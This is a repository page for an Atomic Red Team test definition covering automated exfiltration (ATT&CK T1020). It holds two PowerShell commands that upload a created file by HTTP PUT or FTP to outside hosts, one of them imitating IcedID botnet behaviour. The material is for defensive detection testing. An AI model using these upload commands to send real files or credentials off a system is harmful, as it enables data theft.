security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1020/T1020.yaml
T
Hare Sudhan e742bcb626 Fix schema validation (#2666)
2024-01-20 14:44:16 -06:00

62 lines
2.2 KiB
YAML
Raw Permalink Blame History

attack_technique: T1020
display_name: Automated Exfiltration
atomic_tests:
- name: IcedID Botnet HTTP PUT
auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
description: |-
Creates a text file
Tries to upload to a server via HTTP PUT method with ContentType Header
Deletes a created file
supported_platforms:
- windows
input_arguments:
file:
description: Exfiltration File
type: string
default: C:\temp\T1020_exfilFile.txt
domain:
description: Destination Domain
type: url
default: https://google.com
executor:
command: |-
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
cleanup_command: |-
$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore
name: powershell
- name: Exfiltration via Encrypted FTP
auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
description: Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
supported_platforms:
- windows
input_arguments:
sampleFile:
description: Path of the sample file to exfiltrate.
type: String
default: C:\temp\T1020__FTP_sample.txt
ftpServer:
description: FTP server URL.
type: Url
default: ftp://example.com
credentials:
description: FTP server credentials.
type: String
default: "[user:password]"
executor:
name: powershell
elevation_required: false
command: |
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
$creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
cleanup_command: |
Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
Reference in New Issue View Git Blame Copy Permalink